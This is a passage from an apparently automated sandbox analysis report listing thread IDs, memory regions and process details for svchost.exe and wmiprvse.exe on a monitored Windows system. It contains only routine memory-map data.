0x 390
0x 330
0x 278
0x 200
0x C4C
0x C48
0x 568
0x CE4
0x CEC
0x CE0
0x D5C
0x DB4
0x E44
0x E20
0x E30
0x E28
0x E24
0x D4C
0x D48
0x D38
0x D40
0x D44
0x E54
0x E60
0x E64
0x E74
0x E58
0x B0
0x C60
0x 6E4
0x EA0
0x 708
0x 2C0
0x 428
0x 68C
0x B6C
0x B24
0x 688
0x EC4
0x 84
0x FD4
0x C30
0x C54
0x C44
0x BEC
0x 5E4
0x 3E4
0x 788
0x CD8
0x DE0
0x C74
0x 9E0
0x 200
0x 278
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
pagefile_0x0000001c8ba50000 0x1c8ba50000 0x1c8ba5ffff Pagefile Backed Memory Readable, Writable True False False -
svchost.exe.mui 0x1c8ba60000 0x1c8ba60fff Memory Mapped File Readable False False False -
pagefile_0x0000001c8ba70000 0x1c8ba70000 0x1c8ba83fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8ba90000 0x1c8ba90000 0x1c8bb0ffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8bb10000 0x1c8bb10000 0x1c8bb13fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000001c8bb20000 0x1c8bb20000 0x1c8bb20fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8bb30000 0x1c8bb30000 0x1c8bb31fff Private Memory Readable, Writable True False False -
locale.nls 0x1c8bb40000 0x1c8bbfdfff Memory Mapped File Readable False False False -
private_0x0000001c8bc00000 0x1c8bc00000 0x1c8bc00fff Private Memory Readable, Writable True False False -
private_0x0000001c8bc10000 0x1c8bc10000 0x1c8bc10fff Private Memory Readable, Writable True False False -
private_0x0000001c8bc20000 0x1c8bc20000 0x1c8bc26fff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8bc30000 0x1c8bc30000 0x1c8bc30fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000001c8bc40000 0x1c8bc40000 0x1c8bc40fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8bc50000 0x1c8bc50000 0x1c8bc56fff Private Memory Readable, Writable True False False -
private_0x0000001c8bc60000 0x1c8bc60000 0x1c8bcdffff Private Memory Readable, Writable True True False
pagefile_0x0000001c8bce0000 0x1c8bce0000 0x1c8bce1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000001c8bcf0000 0x1c8bcf0000 0x1c8bcf0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000001c8bd00000 0x1c8bd00000 0x1c8bdfffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8be00000 0x1c8be00000 0x1c8bebffff Pagefile Backed Memory Readable True False False -
iphlpsvc.dll.mui 0x1c8bec0000 0x1c8beccfff Memory Mapped File Readable False False False -
private_0x0000001c8bed0000 0x1c8bed0000 0x1c8bed6fff Private Memory Readable, Writable True False False -
gpsvc.dll.mui 0x1c8bee0000 0x1c8beecfff Memory Mapped File Readable False False False -
cversions.2.db 0x1c8bef0000 0x1c8bef3fff Memory Mapped File Readable True False False -
private_0x0000001c8bf00000 0x1c8bf00000 0x1c8bffffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8c000000 0x1c8c000000 0x1c8c187fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000001c8c190000 0x1c8c190000 0x1c8c310fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8c320000 0x1c8c320000 0x1c8c41ffff Private Memory Readable, Writable True False False -
private_0x0000001c8c420000 0x1c8c420000 0x1c8c49ffff Private Memory Readable, Writable True False False -
cversions.2.db 0x1c8c4a0000 0x1c8c4a3fff Memory Mapped File Readable True False False -
private_0x0000001c8c4b0000 0x1c8c4b0000 0x1c8c4b6fff Private Memory Readable, Writable True False False -
propsys.dll.mui 0x1c8c4c0000 0x1c8c4d0fff Memory Mapped File Readable False False False -
pagefile_0x0000001c8c4e0000 0x1c8c4e0000 0x1c8c4e1fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8c4f0000 0x1c8c4f0000 0x1c8c4f6fff Private Memory Readable, Writable True False False -
private_0x0000001c8c500000 0x1c8c500000 0x1c8c5fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x1c8c600000 0x1c8c936fff Memory Mapped File Readable False False False -
private_0x0000001c8c940000 0x1c8c940000 0x1c8ca3ffff Private Memory Readable, Writable True True False
private_0x0000001c8ca40000 0x1c8ca40000 0x1c8cb3ffff Private Memory Readable, Writable True False False -
private_0x0000001c8cb40000 0x1c8cb40000 0x1c8cc3ffff Private Memory Readable, Writable True False False -
private_0x0000001c8cc40000 0x1c8cc40000 0x1c8cd3ffff Private Memory Readable, Writable True False False -
private_0x0000001c8cd40000 0x1c8cd40000 0x1c8cdbffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8cdc0000 0x1c8cdc0000 0x1c8cdc0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8cdd0000 0x1c8cdd0000 0x1c8cdd2fff Pagefile Backed Memory Readable True False False -
activeds.dll.mui 0x1c8cde0000 0x1c8cde1fff Memory Mapped File Readable False False False -
private_0x0000001c8cdf0000 0x1c8cdf0000 0x1c8cdf6fff Private Memory Readable, Writable True False False -
private_0x0000001c8ce00000 0x1c8ce00000 0x1c8cefffff Private Memory Readable, Writable True False False -
private_0x0000001c8cf00000 0x1c8cf00000 0x1c8cffffff Private Memory Readable, Writable True False False -
private_0x0000001c8d000000 0x1c8d000000 0x1c8d0fffff Private Memory Readable, Writable True False False -
private_0x0000001c8d100000 0x1c8d100000 0x1c8d1fffff Private Memory Readable, Writable True False False -
private_0x0000001c8d200000 0x1c8d200000 0x1c8d2fffff Private Memory Readable, Writable True False False -
private_0x0000001c8d300000 0x1c8d300000 0x1c8d3fffff Private Memory Readable, Writable True False False -
private_0x0000001c8d400000 0x1c8d400000 0x1c8d47ffff Private Memory Readable, Writable True False False -
private_0x0000001c8d480000 0x1c8d480000 0x1c8d4fffff Private Memory Readable, Writable True False False -
private_0x0000001c8d500000 0x1c8d500000 0x1c8d57ffff Private Memory Readable, Writable True False False -
private_0x0000001c8d580000 0x1c8d580000 0x1c8d5fffff Private Memory Readable, Writable True True False
private_0x0000001c8d600000 0x1c8d600000 0x1c8d6fffff Private Memory Readable, Writable True False False -
private_0x0000001c8d700000 0x1c8d700000 0x1c8d7fffff Private Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000007.db 0x1c8d800000 0x1c8d842fff Memory Mapped File Readable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x1c8d850000 0x1c8d8dafff Memory Mapped File Readable True False False -
private_0x0000001c8d8e0000 0x1c8d8e0000 0x1c8d95ffff Private Memory Readable, Writable True True False
private_0x0000001c8d960000 0x1c8d960000 0x1c8da5ffff Private Memory Readable, Writable True False False -
private_0x0000001c8da60000 0x1c8da60000 0x1c8db5ffff Private Memory Readable, Writable True True False
private_0x0000001c8db60000 0x1c8db60000 0x1c8db77fff Private Memory Readable, Writable True True False
datastore.edb 0x1c8db80000 0x1c8db8ffff Memory Mapped File Readable False False False -
pagefile_0x0000001c8db90000 0x1c8db90000 0x1c8db91fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8dba0000 0x1c8dba0000 0x1c8dba0fff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8dbb0000 0x1c8dbb0000 0x1c8dbb1fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8dbc0000 0x1c8dbc0000 0x1c8dbc6fff Private Memory Readable, Writable True False False -
newdev.dll.mui 0x1c8dbd0000 0x1c8dbd6fff Memory Mapped File Readable False False False -
private_0x0000001c8dbe0000 0x1c8dbe0000 0x1c8dcdffff Private Memory Readable, Writable True False False -
private_0x0000001c8dce0000 0x1c8dce0000 0x1c8dddffff Private Memory Readable, Writable True False False -
private_0x0000001c8dde0000 0x1c8dde0000 0x1c8dedffff Private Memory Readable, Writable True True False
private_0x0000001c8dde0000 0x1c8dde0000 0x1c8de5ffff Private Memory Readable, Writable True True False
pagefile_0x0000001c8dee0000 0x1c8dee0000 0x1c8dee0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8def0000 0x1c8def0000 0x1c8def0fff Pagefile Backed Memory Readable, Writable True False False -
vsstrace.dll.mui 0x1c8df00000 0x1c8df08fff Memory Mapped File Readable False False False -
pagefile_0x0000001c8df10000 0x1c8df10000 0x1c8df10fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8df20000 0x1c8df20000 0x1c8e01ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000001c8e020000 0x1c8e020000 0x1c8e09ffff Private Memory Readable, Writable True True False
private_0x0000001c8e0a0000 0x1c8e0a0000 0x1c8e0e0fff Private Memory Readable, Writable True False False -
private_0x0000001c8e0f0000 0x1c8e0f0000 0x1c8e0f7fff Private Memory Readable, Writable True True False
private_0x0000001c8e100000 0x1c8e100000 0x1c8e1fffff Private Memory Readable, Writable True False False -
private_0x0000001c8e200000 0x1c8e200000 0x1c8e2fffff Private Memory Readable, Writable True False False -
private_0x0000001c8e300000 0x1c8e300000 0x1c8e3fffff Private Memory Readable, Writable True False False -
private_0x0000001c8e400000 0x1c8e400000 0x1c8e4fffff Private Memory Readable, Writable True False False -
private_0x0000001c8e500000 0x1c8e500000 0x1c8e57ffff Private Memory Readable, Writable True False False -
private_0x0000001c8e580000 0x1c8e580000 0x1c8e5fffff Private Memory Readable, Writable True False False -
private_0x0000001c8e600000 0x1c8e600000 0x1c8e67ffff Private Memory Readable, Writable True False False -
private_0x0000001c8e680000 0x1c8e680000 0x1c8e6fffff Private Memory Readable, Writable True False False -
private_0x0000001c8e700000 0x1c8e700000 0x1c8e7fffff Private Memory Readable, Writable True False False -
private_0x0000001c8e800000 0x1c8e800000 0x1c8e8fffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x1c8e900000 0x1c8e9defff Memory Mapped File Readable False False False -
private_0x0000001c8e9e0000 0x1c8e9e0000 0x1c8eadffff Private Memory Readable, Writable True False False -
private_0x0000001c8eae0000 0x1c8eae0000 0x1c8ebdffff Private Memory Readable, Writable True False False -
private_0x0000001c8ebe0000 0x1c8ebe0000 0x1c8ecdffff Private Memory Readable, Writable True False False -
private_0x0000001c8ece0000 0x1c8ece0000 0x1c8eddffff Private Memory Readable, Writable True False False -
private_0x0000001c8ede0000 0x1c8ede0000 0x1c8eedffff Private Memory Readable, Writable True False False -
private_0x0000001c8eee0000 0x1c8eee0000 0x1c8efdffff Private Memory Readable, Writable True False False -
private_0x0000001c8efe0000 0x1c8efe0000 0x1c8f0dffff Private Memory Readable, Writable True False False -
private_0x0000001c8f0e0000 0x1c8f0e0000 0x1c8f1dffff Private Memory Readable, Writable True False False -
private_0x0000001c8f1e0000 0x1c8f1e0000 0x1c8f25ffff Private Memory Readable, Writable True False False -
private_0x0000001c8f260000 0x1c8f260000 0x1c8f35ffff Private Memory Readable, Writable True False False -
private_0x0000001c8f360000 0x1c8f360000 0x1c8f45ffff Private Memory Readable, Writable True False False -
private_0x0000001c8f460000 0x1c8f460000 0x1c8f55ffff Private Memory Readable, Writable True True False
private_0x0000001c8f560000 0x1c8f560000 0x1c8f65ffff Private Memory Readable, Writable True False False -
private_0x0000001c8f660000 0x1c8f660000 0x1c8f75ffff Private Memory Readable, Writable True False False -
private_0x0000001c8f760000 0x1c8f760000 0x1c8f85ffff Private Memory Readable, Writable True False False -
private_0x0000001c8f860000 0x1c8f860000 0x1c8f95ffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8f960000 0x1c8f960000 0x1c8f96ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8f970000 0x1c8f970000 0x1c8f97ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8f980000 0x1c8f980000 0x1c8f98ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8f990000 0x1c8f990000 0x1c8f99ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8f9a0000 0x1c8f9a0000 0x1c8f9affff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8f9b0000 0x1c8f9b0000 0x1c8f9bffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000001c8f9c0000 0x1c8f9c0000 0x1c8f9cffff Private Memory Readable, Writable True True False
private_0x0000001c8f9d0000 0x1c8f9d0000 0x1c8f9dffff Private Memory Readable, Writable True True False
private_0x0000001c8f9e0000 0x1c8f9e0000 0x1c8f9e0fff Private Memory Readable, Writable True True False
private_0x0000001c8f9f0000 0x1c8f9f0000 0x1c8f9f6fff Private Memory Readable, Writable True False False -
private_0x0000001c8fa00000 0x1c8fa00000 0x1c8fafffff Private Memory Readable, Writable True False False -
private_0x0000001c8fb00000 0x1c8fb00000 0x1c8fbfffff Private Memory Readable, Writable True False False -
private_0x0000001c8fc00000 0x1c8fc00000 0x1c8fcfffff Private Memory Readable, Writable True False False -
private_0x0000001c8fd00000 0x1c8fd00000 0x1c8fdfffff Private Memory Readable, Writable True False False -
private_0x0000001c8fe00000 0x1c8fe00000 0x1c8fe7ffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8fe80000 0x1c8fe80000 0x1c8fe8ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8fe90000 0x1c8fe90000 0x1c8fe9ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8fea0000 0x1c8fea0000 0x1c8feaffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8feb0000 0x1c8feb0000 0x1c8febffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8fec0000 0x1c8fec0000 0x1c8fecffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000001c8fed0000 0x1c8fed0000 0x1c8fedffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000001c8fee0000 0x1c8fee0000 0x1c8fee6fff Private Memory Readable, Writable True False False -
private_0x0000001c8fef0000 0x1c8fef0000 0x1c8ffeffff Private Memory Readable, Writable True False False -
private_0x0000001c8fff0000 0x1c8fff0000 0x1c8fff0fff Private Memory Readable, Writable True True False
private_0x0000001c90000000 0x1c90000000 0x1c900fffff Private Memory Readable, Writable True False False -
private_0x0000001c90100000 0x1c90100000 0x1c9017ffff Private Memory Readable, Writable True False False -
datastore.edb 0x1c90200000 0x1c9020ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90210000 0x1c9021ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90220000 0x1c9022ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90230000 0x1c9023ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90240000 0x1c9024ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90250000 0x1c9025ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90260000 0x1c9026ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90270000 0x1c9027ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90280000 0x1c9028ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c90290000 0x1c9029ffff Memory Mapped File Readable False False False -
datastore.edb 0x1c902a0000 0x1c902affff Memory Mapped File Readable False False False -
datastore.edb 0x1c902b0000 0x1c902bffff Memory Mapped File Readable False False False -
datastore.edb 0x1c902c0000 0x1c902cffff Memory Mapped File Readable False False False -
datastore.edb 0x1c902d0000 0x1c902dffff Memory Mapped File Readable False False False -
datastore.edb 0x1c902e0000 0x1c902effff Memory Mapped File Readable False False False -
datastore.edb 0x1c902f0000 0x1c902fffff Memory Mapped File Readable False False False -
private_0x0000001c90300000 0x1c90300000 0x1c903fffff Private Memory Readable, Writable True False False -
private_0x0000001c90800000 0x1c90800000 0x1c90803fff Private Memory Readable, Writable True True False
private_0x0000001c90810000 0x1c90810000 0x1c90811fff Private Memory Readable, Writable True True False
private_0x0000001c90820000 0x1c90820000 0x1c90820fff Private Memory Readable, Writable True True False
private_0x0000001c90890000 0x1c90890000 0x1c908dcfff Private Memory Readable, Writable True True False
private_0x0000001c908e0000 0x1c908e0000 0x1c908effff Private Memory Readable, Writable True True False
private_0x0000001c908f0000 0x1c908f0000 0x1c908f7fff Private Memory Readable, Writable True True False
private_0x0000001c90f00000 0x1c90f00000 0x1c90ffffff Private Memory Readable, Writable True True False
private_0x0000001c91000000 0x1c91000000 0x1c910fffff Private Memory Readable, Writable True True False
private_0x0000001c91100000 0x1c91100000 0x1c911fffff Private Memory Readable, Writable True True False
private_0x0000001c91200000 0x1c91200000 0x1c912fffff Private Memory Readable, Writable True True False
private_0x0000001c9a5b0000 0x1c9a5b0000 0x1c9a5bffff Private Memory Readable, Writable True True False
private_0x0000001c9a5c0000 0x1c9a5c0000 0x1c9a5cffff Private Memory Readable, Writable True True False
private_0x0000001c9a5f0000 0x1c9a5f0000 0x1c9a5fffff Private Memory Readable, Writable True True False
private_0x0000001c9a600000 0x1c9a600000 0x1c9a60ffff Private Memory Readable, Writable True True False
private_0x0000001c9a610000 0x1c9a610000 0x1c9a61ffff Private Memory Readable, Writable True True False
private_0x0000001c9a620000 0x1c9a620000 0x1c9a627fff Private Memory Readable, Writable True True False
private_0x0000001c9a630000 0x1c9a630000 0x1c9a63ffff Private Memory Readable, Writable True True False
private_0x0000001c9a6f0000 0x1c9a6f0000 0x1c9a6f6fff Private Memory Readable, Writable True True False
private_0x0000001c9a700000 0x1c9a700000 0x1c9a7fffff Private Memory Readable, Writable True True False
private_0x0000001c9af00000 0x1c9af00000 0x1c9affffff Private Memory Readable, Writable True True False
private_0x00007ff6c6db2000 0x7ff6c6db2000 0x7ff6c6db3fff Private Memory Readable, Writable True True False
private_0x00007ff6c6db6000 0x7ff6c6db6000 0x7ff6c6db7fff Private Memory Readable, Writable True True False
private_0x00007ff6c6db8000 0x7ff6c6db8000 0x7ff6c6db9fff Private Memory Readable, Writable True True False
private_0x00007ff6c6dba000 0x7ff6c6dba000 0x7ff6c6dbbfff Private Memory Readable, Writable True True False
private_0x00007ff6c6dbc000 0x7ff6c6dbc000 0x7ff6c6dbdfff Private Memory Readable, Writable True True False
private_0x00007ff6c6dbe000 0x7ff6c6dbe000 0x7ff6c6dbffff Private Memory Readable, Writable True True False
private_0x00007ff6c6dc0000 0x7ff6c6dc0000 0x7ff6c6dc1fff Private Memory Readable, Writable True True False
private_0x00007ff6c6dc2000 0x7ff6c6dc2000 0x7ff6c6dc3fff Private Memory Readable, Writable True True False
private_0x00007ff6c6dc4000 0x7ff6c6dc4000 0x7ff6c6dc5fff Private Memory Readable, Writable True True False
private_0x00007ff6c6dc6000 0x7ff6c6dc6000 0x7ff6c6dc7fff Private Memory Readable, Writable True True False
private_0x00007ff6c6dc8000 0x7ff6c6dc8000 0x7ff6c6dc9fff Private Memory Readable, Writable True True False
private_0x00007ff6c6dca000 0x7ff6c6dca000 0x7ff6c6dcbfff Private Memory Readable, Writable True True False
private_0x00007ff6c6dcc000 0x7ff6c6dcc000 0x7ff6c6dcdfff Private Memory Readable, Writable True True False
private_0x00007ff6c6dd6000 0x7ff6c6dd6000 0x7ff6c6dd7fff Private Memory Readable, Writable True True False
private_0x00007ff6c6dda000 0x7ff6c6dda000 0x7ff6c6ddbfff Private Memory Readable, Writable True True False
private_0x00007ff6c6dea000 0x7ff6c6dea000 0x7ff6c6debfff Private Memory Readable, Writable True True False
private_0x00007ff6c6dec000 0x7ff6c6dec000 0x7ff6c6dedfff Private Memory Readable, Writable True True False
private_0x00007ff6c6df6000 0x7ff6c6df6000 0x7ff6c6df7fff Private Memory Readable, Writable True True False
private_0x00007ff6c6df8000 0x7ff6c6df8000 0x7ff6c6df9fff Private Memory Readable, Writable True True False
private_0x00007ff6c6dfc000 0x7ff6c6dfc000 0x7ff6c6dfdfff Private Memory Readable, Writable True True False
private_0x00007ff6c6e00000 0x7ff6c6e00000 0x7ff6c6e01fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e02000 0x7ff6c6e02000 0x7ff6c6e03fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e04000 0x7ff6c6e04000 0x7ff6c6e05fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e06000 0x7ff6c6e06000 0x7ff6c6e07fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e08000 0x7ff6c6e08000 0x7ff6c6e09fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e0c000 0x7ff6c6e0c000 0x7ff6c6e0dfff Private Memory Readable, Writable True True False
private_0x00007ff6c6e10000 0x7ff6c6e10000 0x7ff6c6e11fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e14000 0x7ff6c6e14000 0x7ff6c6e15fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e16000 0x7ff6c6e16000 0x7ff6c6e17fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e18000 0x7ff6c6e18000 0x7ff6c6e19fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e20000 0x7ff6c6e20000 0x7ff6c6e21fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e24000 0x7ff6c6e24000 0x7ff6c6e25fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e26000 0x7ff6c6e26000 0x7ff6c6e27fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e2a000 0x7ff6c6e2a000 0x7ff6c6e2bfff Private Memory Readable, Writable True True False
private_0x00007ff6c6e2c000 0x7ff6c6e2c000 0x7ff6c6e2dfff Private Memory Readable, Writable True True False
private_0x00007ff6c6e34000 0x7ff6c6e34000 0x7ff6c6e35fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e36000 0x7ff6c6e36000 0x7ff6c6e37fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e38000 0x7ff6c6e38000 0x7ff6c6e39fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e3e000 0x7ff6c6e3e000 0x7ff6c6e3ffff Private Memory Readable, Writable True True False
private_0x00007ff6c6e40000 0x7ff6c6e40000 0x7ff6c6e41fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e44000 0x7ff6c6e44000 0x7ff6c6e45fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e48000 0x7ff6c6e48000 0x7ff6c6e49fff Private Memory Readable, Writable True True False
private_0x00007ff6c6e4c000 0x7ff6c6e4c000 0x7ff6c6e4dfff Private Memory Readable, Writable True True False
private_0x00007ff6c6e5c000 0x7ff6c6e5c000 0x7ff6c6e5dfff Private Memory Readable, Writable True True False
private_0x00007ff6c6f87000 0x7ff6c6f87000 0x7ff6c6f88fff Private Memory Readable, Writable True True False
private_0x00007ff6c6f8c000 0x7ff6c6f8c000 0x7ff6c6f8dfff Private Memory Readable, Writable True True False
For performance reasons, the remaining 432 entries are omitted.
The remaining entries can be found in flog.txt.
Process #3: wmiprvse.exe
0 0
»
Information Value
ID #3
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:40, Reason: RPC Server
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:53
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xae8
Parent PID 0x248 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B58
0x B30
0x 37C
0x A98
0x ABC
0x 7FC
0x 564
0x 8A4
0x C58
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
pagefile_0x00000008937c0000 0x8937c0000 0x8937cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000008937d0000 0x8937d0000 0x8937d6fff Private Memory Readable, Writable True True False
pagefile_0x00000008937e0000 0x8937e0000 0x8937f3fff Pagefile Backed Memory Readable True False False -
private_0x0000000893800000 0x893800000 0x89387ffff Private Memory Readable, Writable True True False
pagefile_0x0000000893880000 0x893880000 0x893883fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000893890000 0x893890000 0x893890fff Pagefile Backed Memory Readable True False False -
private_0x00000008938a0000 0x8938a0000 0x8938a1fff Private Memory Readable, Writable True True False
locale.nls 0x8938b0000 0x89396dfff Memory Mapped File Readable False False False -
pagefile_0x0000000893970000 0x893970000 0x893971fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000008939f0000 0x8939f0000 0x8939f6fff Private Memory Readable, Writable True True False
private_0x0000000893a00000 0x893a00000 0x893a00fff Private Memory Readable, Writable True True False
private_0x0000000893a10000 0x893a10000 0x893a10fff Private Memory Readable, Writable True True False
user32.dll.mui 0x893a20000 0x893a24fff Memory Mapped File Readable False False False -
pagefile_0x0000000893a30000 0x893a30000 0x893a30fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000893a40000 0x893a40000 0x893b3ffff Private Memory Readable, Writable True True False
pagefile_0x0000000893b40000 0x893b40000 0x893b40fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000893b50000 0x893b50000 0x893b50fff Pagefile Backed Memory Readable True False False -
cimwin32.dll.mui 0x893b70000 0x893b72fff Memory Mapped File Readable False False False -
private_0x0000000893ba0000 0x893ba0000 0x893baffff Private Memory Readable, Writable True True False
sortdefault.nls 0x893bb0000 0x893ee6fff Memory Mapped File Readable False False False -
pagefile_0x0000000893ef0000 0x893ef0000 0x894077fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000894080000 0x894080000 0x894200fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000894210000 0x894210000 0x8942cffff Pagefile Backed Memory Readable True False False -
private_0x00000008942d0000 0x8942d0000 0x89434ffff Private Memory Readable, Writable True True False
private_0x0000000894350000 0x894350000 0x89444ffff Private Memory Readable, Writable True True False
private_0x0000000894450000 0x894450000 0x8944cffff Private Memory Readable, Writable True True False
private_0x00000008944d0000 0x8944d0000 0x89454ffff Private Memory Readable, Writable True True False
private_0x0000000894550000 0x894550000 0x8945cffff Private Memory Readable, Writable True True False
private_0x00000008945d0000 0x8945d0000 0x89464ffff Private Memory Readable, Writable True True False
private_0x0000000894650000 0x894650000 0x8946cffff Private Memory Readable, Writable True True False
pagefile_0x00007df5ffb20000 0x7df5ffb20000 0x7ff5ffb1ffff Pagefile Backed Memory - True False False -
private_0x00007ff7b9b5c000 0x7ff7b9b5c000 0x7ff7b9b5dfff Private Memory Readable, Writable True True False
private_0x00007ff7b9b5e000 0x7ff7b9b5e000 0x7ff7b9b5ffff Private Memory Readable, Writable True True False
pagefile_0x00007ff7b9b60000 0x7ff7b9b60000 0x7ff7b9c5ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff7b9c60000 0x7ff7b9c60000 0x7ff7b9c82fff Pagefile Backed Memory Readable True False False -
private_0x00007ff7b9c84000 0x7ff7b9c84000 0x7ff7b9c85fff Private Memory Readable, Writable True True False
private_0x00007ff7b9c86000 0x7ff7b9c86000 0x7ff7b9c86fff Private Memory Readable, Writable True True False
private_0x00007ff7b9c88000 0x7ff7b9c88000 0x7ff7b9c89fff Private Memory Readable, Writable True True False
private_0x00007ff7b9c8a000 0x7ff7b9c8a000 0x7ff7b9c8bfff Private Memory Readable, Writable True True False
private_0x00007ff7b9c8c000 0x7ff7b9c8c000 0x7ff7b9c8dfff Private Memory Readable, Writable True True False
private_0x00007ff7b9c8e000 0x7ff7b9c8e000 0x7ff7b9c8ffff Private Memory Readable, Writable True True False
wmiprvse.exe 0x7ff7ba0c0000 0x7ff7ba13efff Memory Mapped File Readable, Writable, Executable False False False -
cimwin32.dll 0x7ffb25560000 0x7ffb2572dfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x7ffb25de0000 0x7ffb25e2dfff Memory Mapped File Readable, Writable, Executable False False False -
ncobjapi.dll 0x7ffb2d450000 0x7ffb2d465fff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x7ffb2d700000 0x7ffb2d724fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x7ffb2d730000 0x7ffb2d743fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x7ffb2d750000 0x7ffb2d847fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ffb2e4a0000 0x7ffb2e4b0fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ffb33330000 0x7ffb333aefff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffb39260000 0x7ffb39292fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x7ffb39350000 0x7ffb3936efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffb39610000 0x7ffb39626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffb39780000 0x7ffb3978afff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffb39960000 0x7ffb3998bfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffb39b60000 0x7ffb39b87fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffb39b90000 0x7ffb39bfafff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffb39d60000 0x7ffb39d6efff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffb39d70000 0x7ffb39d82fff Memory Mapped File Readable, Writable, Executable False False False -
